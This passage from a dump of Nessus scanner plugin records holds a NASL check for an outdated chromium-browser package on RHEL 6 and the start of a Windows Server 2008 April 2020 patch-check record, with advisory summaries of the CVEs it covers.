value:\"https://access.redhat.com/security/cve/CVE-2020-6384\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6386\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6407\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6418\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-10531\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:0738\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807343\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807349\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807381\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807498\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807499\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807500\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium-browser package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6407\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(190, 843);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2020/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_els:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '6')) audit(AUDIT_OS_NOT, 'Red Hat 6.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) 
audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel/client/6/6Client/i386/debug',\n 'content/dist/rhel/client/6/6Client/i386/optional/debug',\n 'content/dist/rhel/client/6/6Client/i386/optional/os',\n 'content/dist/rhel/client/6/6Client/i386/optional/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/i386/oracle-java-rm/os',\n 'content/dist/rhel/client/6/6Client/i386/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/i386/os',\n 'content/dist/rhel/client/6/6Client/i386/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/i386/supplementary/debug',\n 'content/dist/rhel/client/6/6Client/i386/supplementary/os',\n 'content/dist/rhel/client/6/6Client/i386/supplementary/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/debug',\n 'content/dist/rhel/client/6/6Client/x86_64/optional/debug',\n 'content/dist/rhel/client/6/6Client/x86_64/optional/os',\n 'content/dist/rhel/client/6/6Client/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/client/6/6Client/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/os',\n 'content/dist/rhel/client/6/6Client/x86_64/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/supplementary/debug',\n 'content/dist/rhel/client/6/6Client/x86_64/supplementary/os',\n 'content/dist/rhel/client/6/6Client/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/hpn/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/hpn/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/hpn/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/optional/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/optional/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/optional/source/SRPMS',\n 
'content/dist/rhel/computenode/6/6ComputeNode/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/scalablefilesystem/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/scalablefilesystem/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/scalablefilesystem/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/supplementary/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/supplementary/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/debug',\n 'content/dist/rhel/server/6/6Server/i386/highavailability/debug',\n 'content/dist/rhel/server/6/6Server/i386/highavailability/os',\n 'content/dist/rhel/server/6/6Server/i386/highavailability/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/loadbalancer/debug',\n 'content/dist/rhel/server/6/6Server/i386/loadbalancer/os',\n 'content/dist/rhel/server/6/6Server/i386/loadbalancer/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/optional/debug',\n 'content/dist/rhel/server/6/6Server/i386/optional/os',\n 'content/dist/rhel/server/6/6Server/i386/optional/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/oracle-java-rm/os',\n 'content/dist/rhel/server/6/6Server/i386/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/os',\n 'content/dist/rhel/server/6/6Server/i386/resilientstorage/debug',\n 'content/dist/rhel/server/6/6Server/i386/resilientstorage/os',\n 'content/dist/rhel/server/6/6Server/i386/resilientstorage/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/supplementary/debug',\n 'content/dist/rhel/server/6/6Server/i386/supplementary/os',\n 
'content/dist/rhel/server/6/6Server/i386/supplementary/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/highavailability/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/highavailability/os',\n 'content/dist/rhel/server/6/6Server/x86_64/highavailability/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/hpn/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/hpn/os',\n 'content/dist/rhel/server/6/6Server/x86_64/hpn/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/loadbalancer/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/loadbalancer/os',\n 'content/dist/rhel/server/6/6Server/x86_64/loadbalancer/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/optional/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/optional/os',\n 'content/dist/rhel/server/6/6Server/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/server/6/6Server/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/os',\n 'content/dist/rhel/server/6/6Server/x86_64/resilientstorage/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/resilientstorage/os',\n 'content/dist/rhel/server/6/6Server/x86_64/resilientstorage/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/sap-hana/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/sap-hana/os',\n 'content/dist/rhel/server/6/6Server/x86_64/sap-hana/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/sap/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/sap/os',\n 'content/dist/rhel/server/6/6Server/x86_64/sap/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/scalablefilesystem/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/scalablefilesystem/os',\n 'content/dist/rhel/server/6/6Server/x86_64/scalablefilesystem/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/source/SRPMS',\n 
'content/dist/rhel/server/6/6Server/x86_64/supplementary/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/supplementary/os',\n 'content/dist/rhel/server/6/6Server/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/debug',\n 'content/dist/rhel/workstation/6/6Workstation/i386/optional/debug',\n 'content/dist/rhel/workstation/6/6Workstation/i386/optional/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/optional/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/oracle-java-rm/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/supplementary/debug',\n 'content/dist/rhel/workstation/6/6Workstation/i386/supplementary/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/supplementary/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/optional/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/optional/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/scalablefilesystem/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/scalablefilesystem/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/scalablefilesystem/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/supplementary/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/supplementary/os',\n 
'content/dist/rhel/workstation/6/6Workstation/x86_64/supplementary/source/SRPMS',\n 'content/els/rhel/server/6/6Server/i386/debug',\n 'content/els/rhel/server/6/6Server/i386/optional/debug',\n 'content/els/rhel/server/6/6Server/i386/optional/os',\n 'content/els/rhel/server/6/6Server/i386/optional/source/SRPMS',\n 'content/els/rhel/server/6/6Server/i386/os',\n 'content/els/rhel/server/6/6Server/i386/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/debug',\n 'content/els/rhel/server/6/6Server/x86_64/optional/debug',\n 'content/els/rhel/server/6/6Server/x86_64/optional/os',\n 'content/els/rhel/server/6/6Server/x86_64/optional/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/os',\n 'content/els/rhel/server/6/6Server/x86_64/sap-hana/debug',\n 'content/els/rhel/server/6/6Server/x86_64/sap-hana/os',\n 'content/els/rhel/server/6/6Server/x86_64/sap-hana/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/sap/debug',\n 'content/els/rhel/server/6/6Server/x86_64/sap/os',\n 'content/els/rhel/server/6/6Server/x86_64/sap/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/source/SRPMS',\n 'content/fastrack/rhel/client/6/i386/debug',\n 'content/fastrack/rhel/client/6/i386/optional/debug',\n 'content/fastrack/rhel/client/6/i386/optional/os',\n 'content/fastrack/rhel/client/6/i386/optional/source/SRPMS',\n 'content/fastrack/rhel/client/6/i386/os',\n 'content/fastrack/rhel/client/6/i386/source/SRPMS',\n 'content/fastrack/rhel/client/6/x86_64/debug',\n 'content/fastrack/rhel/client/6/x86_64/optional/debug',\n 'content/fastrack/rhel/client/6/x86_64/optional/os',\n 'content/fastrack/rhel/client/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/client/6/x86_64/os',\n 'content/fastrack/rhel/client/6/x86_64/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/hpn/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/hpn/os',\n 
'content/fastrack/rhel/computenode/6/x86_64/hpn/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/optional/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/optional/os',\n 'content/fastrack/rhel/computenode/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/os',\n 'content/fastrack/rhel/computenode/6/x86_64/scalablefilesystem/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/scalablefilesystem/os',\n 'content/fastrack/rhel/computenode/6/x86_64/scalablefilesystem/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/debug',\n 'content/fastrack/rhel/server/6/i386/highavailability/debug',\n 'content/fastrack/rhel/server/6/i386/highavailability/os',\n 'content/fastrack/rhel/server/6/i386/highavailability/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/loadbalancer/debug',\n 'content/fastrack/rhel/server/6/i386/loadbalancer/os',\n 'content/fastrack/rhel/server/6/i386/loadbalancer/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/optional/debug',\n 'content/fastrack/rhel/server/6/i386/optional/os',\n 'content/fastrack/rhel/server/6/i386/optional/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/os',\n 'content/fastrack/rhel/server/6/i386/resilientstorage/debug',\n 'content/fastrack/rhel/server/6/i386/resilientstorage/os',\n 'content/fastrack/rhel/server/6/i386/resilientstorage/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/debug',\n 'content/fastrack/rhel/server/6/x86_64/highavailability/debug',\n 'content/fastrack/rhel/server/6/x86_64/highavailability/os',\n 'content/fastrack/rhel/server/6/x86_64/highavailability/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/hpn/debug',\n 'content/fastrack/rhel/server/6/x86_64/hpn/os',\n 'content/fastrack/rhel/server/6/x86_64/hpn/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/loadbalancer/debug',\n 
'content/fastrack/rhel/server/6/x86_64/loadbalancer/os',\n 'content/fastrack/rhel/server/6/x86_64/loadbalancer/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/optional/debug',\n 'content/fastrack/rhel/server/6/x86_64/optional/os',\n 'content/fastrack/rhel/server/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/os',\n 'content/fastrack/rhel/server/6/x86_64/resilientstorage/debug',\n 'content/fastrack/rhel/server/6/x86_64/resilientstorage/os',\n 'content/fastrack/rhel/server/6/x86_64/resilientstorage/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/scalablefilesystem/debug',\n 'content/fastrack/rhel/server/6/x86_64/scalablefilesystem/os',\n 'content/fastrack/rhel/server/6/x86_64/scalablefilesystem/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/i386/debug',\n 'content/fastrack/rhel/workstation/6/i386/optional/debug',\n 'content/fastrack/rhel/workstation/6/i386/optional/os',\n 'content/fastrack/rhel/workstation/6/i386/optional/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/i386/os',\n 'content/fastrack/rhel/workstation/6/i386/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/x86_64/debug',\n 'content/fastrack/rhel/workstation/6/x86_64/optional/debug',\n 'content/fastrack/rhel/workstation/6/x86_64/optional/os',\n 'content/fastrack/rhel/workstation/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/x86_64/os',\n 'content/fastrack/rhel/workstation/6/x86_64/scalablefilesystem/debug',\n 'content/fastrack/rhel/workstation/6/x86_64/scalablefilesystem/os',\n 'content/fastrack/rhel/workstation/6/x86_64/scalablefilesystem/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/x86_64/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'chromium-browser-80.0.3987.122-1.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE},\n {'reference':'chromium-browser-80.0.3987.122-1.el6_10', 'cpu':'x86_64', 'release':'6', 
'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n var enterprise_linux_flag = rhel_repo_urls_has_content_dist_rhel(repo_urls:repo_relative_urls);\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp']) && !enterprise_linux_flag) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = 
rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium-browser');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-05T14:16:45", "description": "The remote Windows host is missing security update 4550957 or cumulative update 4550951. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0957, CVE-2020-0958)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. 
(CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0946)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1007)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. 
There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-1000)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550957: Windows Server 2008 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0938", "CVE-2020-0946", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0957", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", 
"CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0982", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1014", "CVE-2020-1020", "CVE-2020-1027"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550951.NASL", "href": "https://www.tenable.com/plugins/nessus/135470", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135470);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0938\",\n \"CVE-2020-0946\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0957\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n 